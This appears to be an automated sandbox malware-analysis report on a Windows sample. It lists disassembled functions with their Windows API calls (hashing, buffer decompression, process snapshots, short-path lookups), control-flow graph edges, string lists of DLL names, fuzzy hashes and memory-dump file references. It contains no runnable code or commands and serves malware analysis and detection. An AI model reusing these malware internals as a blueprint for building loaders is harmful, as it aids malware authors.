      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $.$Api-ms-win-downlevel-advapi32-l1-1-1.dll$CustomMarshalers.dll$D,y`$DevicePairingHandler.dll$FXSCOVER.exe$KBDBGPH.DLL$Microsoft.Windows.Diagnosis.TroubleshootingPack.resources.dll$MmcAspExt.dll$NlsData0047.dll$OleCreateFromDataEx$RegGetKeySecurity$RtlDelete$RtlQuerySecurityObject$RtlUnicodeStringToOemSize$SensorsApi.dll$System.Configuration.Install.ni.dll$System.IO.dll$VarCyMulI8$igd10umd32.dll$mssitlb.dll$mswmdm.dll$oleacchooks.dll$spwmp.dll
      • API String ID: 0-571057648
      • Opcode ID: 837c685f78292b0f1606fd949dab1544831e29e3e3fc60c96b0bd03d4c7ad5a8
      • Instruction ID: 0ae2afd8c63baf23de251440c667564a859947553ed072fb774a3222ecfdf207
      • Opcode Fuzzy Hash: 837c685f78292b0f1606fd949dab1544831e29e3e3fc60c96b0bd03d4c7ad5a8
      • Instruction Fuzzy Hash: 2A23153490425D8FDB10EFA4D881BDDBBB5FF0A308F1040AAE444B77A2D639AA55CF65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00897244 Relevance: 67.7, Strings: 51, Instructions: 3903COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $$$,$,y`~$BrEvIF.dll$CNHL610.DLL$D,y`$ElfReportEventAndSourceW$GetClassFile$GetOverlappedAccessResults$IPBusEnumProxy.dll$KBDLT.DLL$KBDUSR.DLL$MigSetup.exe$NAPSTAT.EXE$NetDfsRemove$NetSetPrimaryComputerName$PresentationCore.dll$RtlEqualLuid$SfmDxSetSwapChainBindingStatus$StgOpenStorageOnILockBytes$^$api-ms-win-core-interlocked-l1-1-0.dll$api-ms-win-core-processenvironment-l1-1-0.dll$api-ms-win-core-profile-l1-1-0.dll$bcdedit.exe$dmdskmgr.dll$esscli.dll$mciseq.dll$mstask.dll$netshell.dll$s$sdclt.exe$vmictimeprovider.dll
      • API String ID: 0-3751233841
      • Opcode ID: 765d7ee5cd3482c3e572a7b0b00ebe5888e4cb3d417b3a14dceebf025310320a
      • Instruction ID: d5705780c892bafa6df46128ae735e4f56b141e536515f108fab6bc7d1f2bfca
      • Opcode Fuzzy Hash: 765d7ee5cd3482c3e572a7b0b00ebe5888e4cb3d417b3a14dceebf025310320a
      • Instruction Fuzzy Hash: E8933B3490826ACFDB00DF68E981ADDBBF5FB4A304F1040A6D448B7B61D734AA55CF66
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00878884 Relevance: 67.0, APIs: 7, Strings: 30, Instructions: 2271encryptionCOMMON
      Download Yara Rule
      APIs
      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,008A9A44,00000000,0087AFBF,?,?,?,?,?,00000000), ref: 00878AFB
      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,00000000,0087AD62,?,?,?,?,?,?,00000000,0087B0A4), ref: 00878B94
      • CryptHashData.ADVAPI32(00000000,008A4525,00000000,00000000,438E1DA9,?,00000000,0087A507,?,?,?,?,?,?,?,00000000), ref: 00878EE3
      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00879370
      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,008A4525), ref: 00879732
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Crypt$Hash$Param$AcquireContextCreateData
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $,y`~$D,y`$I$MSTTSuser.dll$NlsData004e.dll$OleInitializeWOW$QuerySendMessage$System.Diagnostics.TextWriterTraceListener.dll$System.Speech.ni.dll$api-ms-win-core-fibers-l1-1-0.dll$dpnlobby.dll$wcsstr$wkscli.dll
      • API String ID: 2428702908-2360565770
      • Opcode ID: 4aa3557ba7c9669ed2d383384b856f4c218db0c9a910a5b0a0425b3726d68a2c
      • Instruction ID: cf61213450a772018895127d1e37cd81cfaede83b8eb6fc4599cb68f8fb24d5b
      • Opcode Fuzzy Hash: 4aa3557ba7c9669ed2d383384b856f4c218db0c9a910a5b0a0425b3726d68a2c
      • Instruction Fuzzy Hash: 90334034909259CFEB00DF68EC81BCDBBB5FB4A304F1080A6D488A7B61D735AA56CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00885B34 Relevance: 66.3, APIs: 1, Strings: 36, Instructions: 1564COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 2856 885b34-885b38 2857 885b3d-885b42 2856->2857 2857->2857 2858 885b44-885b6e 2857->2858 2859 885b74 2858->2859 2860 888605-888609 2858->2860 2859->2860 2861 88860f-888613 2860->2861 2862 889f95-88a29f call 4076f4 call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 call 4076f4 call 409d28 * 2 call 409cf8 call 409d28 * 6 call 409c98 2860->2862 2861->2862 2864 888619-888647 call 4076f4 2861->2864 2870 88879d-8887ed call 40a0c0 call 6c0b28 call 4076e8 2864->2870 2871 88864d-888656 2864->2871 2893 8887ff-888870 call 40a0c0 * 2 call 422c7c call 40ab7c call 40a624 call 878884 call 881940 2870->2893 2894 8887ef-8887fa 2870->2894 2874 888658-8886be call 4076e8 2871->2874 2875 8886c0-888715 2871->2875 2876 88871a-88873e call 407278 2874->2876 2875->2876 2876->2870 2887 888740-888798 call 4076f4 * 2 2876->2887 2887->2870 2925 888875-888877 2893->2925 2894->2893 2927 88887d-888881 2925->2927 2928 889b67-889b69 2925->2928 2930 88888f-888898 2927->2930 2931 888883-888884 2927->2931 2933 889b6c-889b75 2928->2933 2938 8888f8-888907 call 40acb4 2930->2938 2939 88889a-8888a6 2930->2939 2936 88998a-8899c0 call 407278 2931->2936 2937 88888a 2931->2937 2934 889b7b-889bae call 40a0c0 * 2 2933->2934 2935 889f2f-889f36 2933->2935 2980 889bb0 2934->2980 2981 889bb4-889bc5 2934->2981 2935->2933 2946 889f3c-889f75 call 40a0c0 * 2 call 40acec call 40acb4 2935->2946 2961 8899de-8899f9 call 8764fc 2936->2961 2962 8899c2-8899dc 2936->2962 2944 889a27-889a35 2937->2944 2959 88890d-888921 call 40a0c0 2938->2959 2960 8889a7-8889af call 40a0c0 2938->2960 2947 8888a8-8888f0 call 40a0c0 * 5 2939->2947 2948 8888f2-8888f6 2939->2948 2955 889a3b-889a4f 2944->2955 2956 889ad6-889b62 call 40a0c0 * 5 call 40acec call 40a0c0 call 40acec call 40a0c0 * 2 2944->2956 3043 889f8a-889f90 call 40a0c0 2946->3043 3044 889f77-889f85 call 40acec 2946->3044 2947->2948 2948->2938 2948->2939 2965 889aa9-889ad1 call 40a0c0 call 40acec call 40a0c0 2955->2965 2966 889a51-889aa4 call 40acec * 3 call 40a0c0 * 2 2955->2966 2956->2928 2995 888923-888982 call 40acec * 4 call 40a0c0 * 2 2959->2995 2996 888987-8889a5 call 40acec call 40a0c0 2959->2996 2987 8889b4-888a5d call 40a0c0 * 2 call 40acec call 40a0c0 call 6c08bc call 40acec call 40a0c0 * 3 2960->2987 2972 8899fe-889a1f call 40a0c0 * 2 2961->2972 2962->2972 2965->2956 2966->2965 2972->2944 3026 889a22 call 40acec 2972->3026 2980->2981 2992 889bcb-889be2 2981->2992 2993 889bc7 2981->2993 3110 888a5f-888ac9 call 4076e8 2987->3110 3111 888ad1-888ae0 call 40acb4 2987->3111 3006 889beb-889f29 call 40a3c0 * 25 call 40a494 call 40a9e8 call 40acec * 2 2992->3006 3007 889be4 2992->3007 2993->2992 2995->2996 2996->2987 3006->2934 3006->2935 3007->3006 3026->2944 3043->2862 3044->3043 3110->3111 3120 888b3a-888b98 3111->3120 3121 888ae2-888b38 call 4076f4 3111->3121 3125 888ba7-888beb call 870fd8 3120->3125 3121->3125 3136 888bed-888c11 call 87fa9c 3125->3136 3137 888c13-888c28 call 40a0c0 3125->3137 3143 888c2d-888c7d call 4076e8 call 6c0994 call 6c0a40 call 6c0a5c 3136->3143 3137->3143 3164 888c83-888c9b call 40aefc 3143->3164 3165 888d66-888d74 call 40acec 3143->3165 3174 888c9d-888cdd call 4076f4 call 40a0c0 * 4 3164->3174 3175 888cdf-888d36 call 40acec * 2 call 40a0c0 call 40acec call 40a0c0 * 2 3164->3175 3171 888d79-888de0 call 40a0c0 * 5 call 6c0a40 * 2 RtlDecompressBuffer 3165->3171 3228 889452-889471 3171->3228 3229 888de6-888df2 3171->3229 3218 888d3b-888d64 call 40a0c0 call 40acec call 40a0c0 3174->3218 3175->3218 3218->3171 3232 8894dd-8894f2 3228->3232 3233 889473-889475 3228->3233 3234 888df5-888dfe 3229->3234 3239 88950a-889528 3232->3239 3240 8894f4-889505 3232->3240 3238 889478-8894db 3233->3238 3241 888e5c-888e7c call 40a0c0 call 87eb5c 3234->3241 3242 888e00-888e5a call 4076f4 3234->3242 3238->3232 3238->3238 3246 88952e-889543 3239->3246 3247 889605-88961a call 407eac 3239->3247 3240->3239 3241->3234 3262 888e82-888ed4 call 40a0c0 * 2 call 40acec call 6c0a5c call 6c0994 3241->3262 3242->3241 3252 8895a1-889600 call 4076e8 3246->3252 3253 889545-88959f 3246->3253 3252->3247 3253->3247 3273 888fa9-888fd8 call 40a0c0 * 3 3262->3273 3274 888eda-888ee6 3262->3274 3295 888fde-888fe7 3273->3295 3296 88909f-8890a8 3273->3296 3275 888ee8-888f37 call 40a0c0 * 5 call 40acec 3274->3275 3276 888f3f-888f55 call 40a0c0 3274->3276 3275->3276 3284 888f9f-888fa3 3276->3284 3285 888f57-888f9a call 40a0c0 * 6 3276->3285 3284->3273 3284->3274 3285->3284 3301 889038-88909a call 40acec * 4 call 40a0c0 * 2 3295->3301 3302 888fe9-889033 call 40a0c0 * 6 3295->3302 3298 8892de-889327 call 40acec call 40a0c0 * 5 3296->3298 3299 8890ae-8890e8 call 40a0c0 call 40acec call 40a0c0 3296->3299 3363 88932c-88933a 3298->3363 3340 8890ea 3299->3340 3341 8890ee-8890ff 3299->3341 3301->3363 3302->3363 3340->3341 3346 889101 3341->3346 3347 889105-8892dc call 40a3c0 * 14 call 40a494 call 40a9e8 call 40a0c0 * 2 3341->3347 3346->3347 3347->3363 3367 889349-889363 call 6c0a40 call 6c0b28 3363->3367 3368 88933c-889344 call 40a0c0 3363->3368 3378 889366-88936f 3367->3378 3368->3367 3380 8893dc-8893e3 3378->3380 3381 889371-8893da call 4076e8 call 4076f4 3378->3381 3380->3378 3385 8893e5-8893f6 3380->3385 3381->3380 3388 8893f8-889408 3385->3388 3389 88940a-889415 3385->3389 3392 88941a-88944d call 40a0c0 * 2 call 40acec call 40a0c0 3388->3392 3389->3392 3392->3228
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $,y`~$AuthFWWizFwk.dll$CNB_0279.DLL$CreateEventExA$CryptGetDefaultProviderA$D,y`$EventWrite$GetInformationCodeAuthzLevelW$GetUserObjectInformationA$IMJPAPI.DLL$MPG4DECD.DLL$Microsoft.Windows.Diagnosis.SDuser.ni.dll$NlsLexicons0007.dll$RtlGetFullPathName_U$System.Data.DataSetExtensions.dll$System.Runtime.Serialization.Xml.dll$VarI4FromR8$WMPEncEn.dll$WcsPlugInService.dll$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-0.dll$api-ms-win-core-threadpool-l1-1-0.dll$hpzprw71.dll$imkrhjd.dll$mimefilt.dll$oledb32r.dll$srcore.dll$sspisrv.dll$w3ctrs.dll$wow64win.dll
      • API String ID: 0-815326250
      • Opcode ID: bd6f776698bf5ebe3350416b0fe2377eecb546d571adda2870142f05ecf6b7a2
      • Instruction ID: ed27780ebbea777809120fd9b064ea54145ce40deeb132efdad1df661e81c355
      • Opcode Fuzzy Hash: bd6f776698bf5ebe3350416b0fe2377eecb546d571adda2870142f05ecf6b7a2
      • Instruction Fuzzy Hash: 28F2F635908219CFDB04EFA8E981ACDB7F9FB49304F2040AAE444B76A1D735AE45CF65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0087885C Relevance: 48.5, APIs: 6, Strings: 21, Instructions: 1298encryptionCOMMON
      Download Yara Rule
      APIs
      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,008A9A44,00000000,0087AFBF,?,?,?,?,?,00000000), ref: 00878AFB
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AcquireContextCrypt
      • String ID: $ $ $ $ $ $ $ $ $ $ $,y`~$D,y`$I$NlsData004e.dll$QuerySendMessage$System.Diagnostics.TextWriterTraceListener.dll$System.Speech.ni.dll$api-ms-win-core-fibers-l1-1-0.dll$dpnlobby.dll$wkscli.dll
      • API String ID: 3951991833-2433273046
      • Opcode ID: cb655dd901a2edca7c057b9806bcc2dc5e851f49d6a569c3868c3ae72fad8629
      • Instruction ID: 1badded1f196fce5c145a215bd205b4eb7a22d0e2d7c4048eae815bd25d821b8
      • Opcode Fuzzy Hash: cb655dd901a2edca7c057b9806bcc2dc5e851f49d6a569c3868c3ae72fad8629
      • Instruction Fuzzy Hash: F5D23D34909269CFEB00DF68E881BDDBBB5FB0A314F1080A6E489E7B61D734A945CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040D588 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D648,?,?), ref: 0040D5BA
      • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D648,?,?), ref: 0040D5C3
        • Part of subcall function 0040D450: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D483
        • Part of subcall function 0040D450: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D493
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
      • String ID:
      • API String ID: 3216391948-0
      • Opcode ID: c883772947d83777b864ba3430caf66e322057a584b7fefcdaed39e92a4a314e
      • Instruction ID: 25030a7f6e56920aab91c9f9ef49b25f0e59bcaefeffaeca5518035f8508ca9f
      • Opcode Fuzzy Hash: c883772947d83777b864ba3430caf66e322057a584b7fefcdaed39e92a4a314e
      • Instruction Fuzzy Hash: 15118770E046099FDB00EF95C982AAEB7B5EF49304F50447EB505F73D2DB785E048659
      Uniqueness

      Uniqueness Score: -1.00%

      Function 027667C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
      Download Yara Rule
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027667EE
      • Module32First.KERNEL32(00000000,00000224), ref: 0276680E
      Memory Dump Source
      • Source File: 00000000.00000002.258419981.0000000002766000.00000040.00000800.00020000.00000000.sdmp, Offset: 02766000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2766000_file.jbxd
      Yara matches
      Similarity
      • API ID: CreateFirstModule32SnapshotToolhelp32
      • String ID:
      • API String ID: 3833638111-0
      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction ID: 3a667d92c690feacdded4e503ef688793ff198e058443520b9cb777a7b02aa1e
      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction Fuzzy Hash: 7AF096352007126FD7203FF5A88DB7E76ECAF49629F500528EA43914C0DB78E8858A61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040D450 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
      Download Yara Rule
      APIs
      • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D483
      • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D493
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Find$CloseFileFirst
      • String ID:
      • API String ID: 2295610775-0
      • Opcode ID: 7f3f629f4f65ece58cf40c0a0a45b63a812c2af1330b8aacf4586db4167fe9c0
      • Instruction ID: f2ddfbd44667415a75ad9902d530f29ac780b5eb62706bbca6fac38aac60a985
      • Opcode Fuzzy Hash: 7f3f629f4f65ece58cf40c0a0a45b63a812c2af1330b8aacf4586db4167fe9c0
      • Instruction Fuzzy Hash: EAF0E970940608AEC750FBB9CC1298EB3ECDB093147A14577F404F32D1E63C5E045518
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00871424 Relevance: 64.5, APIs: 2, Strings: 34, Instructions: 1507COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 3423 871424-871427 3424 87142c-871431 3423->3424 3424->3424 3425 871433-8715b9 call 85e4bc call 870fd8 call 4076f4 call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 3424->3425 3458 8715bb-8715c5 3425->3458 3459 8715c8-8715ee call 40a884 call 40a0c0 3425->3459 3458->3459 3464 871674-8716ac call 40a0c0 * 4 3459->3464 3465 8715f4-8715f6 3459->3465 3483 8716ae-8716b8 3464->3483 3484 8716bb-8716e4 call 40a71c * 2 GetShortPathNameW call 40a0c0 3464->3484 3466 8715f9-87164d call 40a0c0 * 3 call 40acec call 40a0c0 * 2 3465->3466 3493 87164f-87166f call 40a0c0 * 3 3466->3493 3483->3484 3496 8716e9-8716f2 3484->3496 3493->3464 3498 871779-871798 call 40a0c0 * 2 3496->3498 3499 8716f8-8716fa 3496->3499 3512 871943-871991 call 40a0c0 call 40acec call 40a0c0 * 4 3498->3512 3513 87179e-8717d0 call 40a0c0 * 3 3498->3513 3500 8716fd-871767 call 40a0c0 call 40acec call 40a0c0 * 2 call 40acec * 2 3499->3500 3542 871769-871774 call 40a0c0 3500->3542 3551 871996-87199c call 40a0c0 3512->3551 3534 8717d6-8717e7 3513->3534 3535 8717d2 3513->3535 3538 8717ed-871941 call 40a3c0 * 10 call 40a494 call 40a9e8 call 40a0c0 * 2 3534->3538 3539 8717e9 3534->3539 3535->3534 3538->3551 3539->3538 3549 8719a1-8719b0 call 40acb4 3542->3549 3558 8719b6-8719c7 3549->3558 3559 871b70-871b87 call 40aefc 3549->3559 3551->3549 3562 8719cd-8719de 3558->3562 3563 8719c9 3558->3563 3569 871bcd-871c18 call 40acec call 40a0c0 * 5 3559->3569 3570 871b89-871bcb call 40a0c0 * 6 3559->3570 3564 8719e4-871b6b call 40a3c0 * 12 call 40a494 call 40a9e8 call 40a0c0 3562->3564 3565 8719e0 3562->3565 3563->3562 3617 871c1d-871c41 call 40a0c0 * 2 3564->3617 3565->3564 3569->3617 3570->3617 3632 871c43-871c4b 3617->3632 3633 871c4e-871c52 3617->3633 3632->3633 3636 871c54-871c5a call 40a0c0 3633->3636 3637 871c5f-871c6b 3633->3637 3636->3637 3642 871c6d-871c77 3637->3642 3643 871c7a-871c80 3637->3643 3642->3643 3645 871c86-871ca4 call 40a0c0 3643->3645 3646 871fea-871ffe call 40a884 3643->3646 3656 871d4c-871dae call 87039c call 40a0c0 call 40a884 3645->3656 3657 871caa-871cd2 call 40a0c0 call 407278 3645->3657 3653 872004-872020 call 40a0c0 3646->3653 3654 8720eb-8720fa call 40acb4 3646->3654 3668 872077-87209b call 40a0c0 * 2 3653->3668 3669 872022-872072 call 40a0c0 call 40acec call 40a0c0 * 3 call 40acec 3653->3669 3670 872161-872167 call 40a0c0 3654->3670 3671 8720fc-87211b call 40a0c0 * 2 3654->3671 3704 871db0-871db8 3656->3704 3705 871dbb-871dc2 3656->3705 3682 871d37-871d46 call 40a0c0 3657->3682 3683 871cd4-871d32 call 4076f4 3657->3683 3706 8720e1-8720e5 3668->3706 3707 87209d-8720dc call 40a0c0 * 6 3668->3707 3669->3668 3687 87216c-872177 call 40acb4 3670->3687 3671->3687 3709 87211d-87215f call 40a0c0 * 6 3671->3709 3682->3656 3682->3657 3683->3682 3710 872245-872261 call 40a0c0 * 3 3687->3710 3711 87217d-872186 3687->3711 3704->3705 3712 871ec4-871ee5 call 407278 call 40a0c0 3705->3712 3713 871dc8-871ded call 40aefc 3705->3713 3706->3653 3706->3654 3707->3706 3709->3687 3759 872266-87226f 3710->3759 3720 8721db-872220 call 40acec call 40a0c0 * 5 3711->3720 3721 872188-8721d9 call 40a0c0 * 3 call 40acec call 40a0c0 * 2 3711->3721 3744 871eea-871f27 call 87039c call 407278 3712->3744 3731 871e53-871e9d 3713->3731 3732 871def-871e51 call 4076e8 3713->3732 3806 872225-872243 call 40acec call 40a0c0 3720->3806 3721->3806 3742 871ea2-871ec2 3731->3742 3732->3742 3742->3744 3777 871f29-871f36 3744->3777 3778 871f38-871f42 3744->3778 3765 872271-87227c call 40a0c0 3759->3765 3766 87227e-872284 call 40a0c0 3759->3766 3783 872289-8724bb call 40a0c0 * 2 call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 3765->3783 3766->3783 3786 871f47-871f5c 3777->3786 3778->3786 3866 872517-872556 call 40a0c0 * 6 3783->3866 3867 8724bd-872515 call 40a0c0 call 40acec * 2 call 40a0c0 * 3 3783->3867 3792 871f70-871f8a call 87039c 3786->3792 3793 871f5e-871f6e 3786->3793 3798 871f8f-871fa0 3792->3798 3793->3798 3804 871fa2-871fa7 3798->3804 3805 871fac-871fb8 3798->3805 3804->3805 3810 871fc7-871fe7 call 40a71c * 2 GetShortPathNameW 3805->3810 3811 871fba-871fc4 3805->3811 3806->3759 3810->3646 3811->3810 3890 87255b-8725a9 call 40a0c0 * 6 3866->3890 3867->3890 3904 8725b6-8725bd 3890->3904 3905 8725ab-8725b3 3890->3905 3906 8725c3-8725cc 3904->3906 3907 8728aa-8728b3 3904->3907 3905->3904 3908 8725ce-872626 call 40a0c0 call 40acec call 40a0c0 * 3 call 40acec 3906->3908 3909 87262b-87266c call 40a0c0 * 4 3906->3909 3910 872ab1-872ab9 call 40a0c0 3907->3910 3911 8728b9-8728ce call 40aefc 3907->3911 3908->3907 3945 872672-872683 3909->3945 3946 87266e 3909->3946 3919 872abe-872af8 call 409d28 * 2 call 409cf8 3910->3919 3911->3919 3923 8728d4-872aaf call 40acec call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 call 40a0c0 * 4 3911->3923 3923->3919 3949 872685 3945->3949 3950 872689-8728a5 call 40a3c0 * 11 call 6ba5a8 * 3 call 40a3c0 * 4 call 40a494 call 40a9e8 call 40a0c0 3945->3950 3946->3945 3949->3950 3950->3907
      APIs
      • GetShortPathNameW.KERNELBASE(00000000,00000000,00000000), ref: 008716D5
      • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00871FE1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: NamePathShort
      • String ID: $ $ $ $ $ $7$CsrClientCallServer$D,y`$EP7MDL0M.DLL$EndPaint$FXSAPI.DLL$GetNamedPipeClientComputerNameW$IMJPDADM.EXE$Microsoft.Windows.Diagnosis.SDHost.ni.dll$PresentationFramework.AeroLite.dll$RtlNtStatusToDosErrorNoTeb$RtlWow64EnableFsRedirection$SafeArrayAllocDescriptor$SnippingTool.exe$System.ServiceModel.Internals.dll$System.Web.Mobile.dll$XamlBuildTask.dll$dpnhupnp.dll$dtsh.dll$ieinstal.exe$imscui.DLL$mcplayer.dll$msado15.dll$poqexec.exe$scecli.dll$vds.exe$wscapi.dll$wups.dll
      • API String ID: 1295925010-722105938
      • Opcode ID: 5d2e70cf41b711fdf37418ce401aa14d087043d00f043388017297650e2e39ee
      • Instruction ID: 801be07d2291bbea64fa8f8c54778c6b45d2fa94bc2df491ff9f6b9b40d7c6af
      • Opcode Fuzzy Hash: 5d2e70cf41b711fdf37418ce401aa14d087043d00f043388017297650e2e39ee
      • Instruction Fuzzy Hash: 53F2393491425ECFDB00EFA4C881ADEB7B5FF49308F108066D444B77A6D734AA5ACB66
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040D074 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
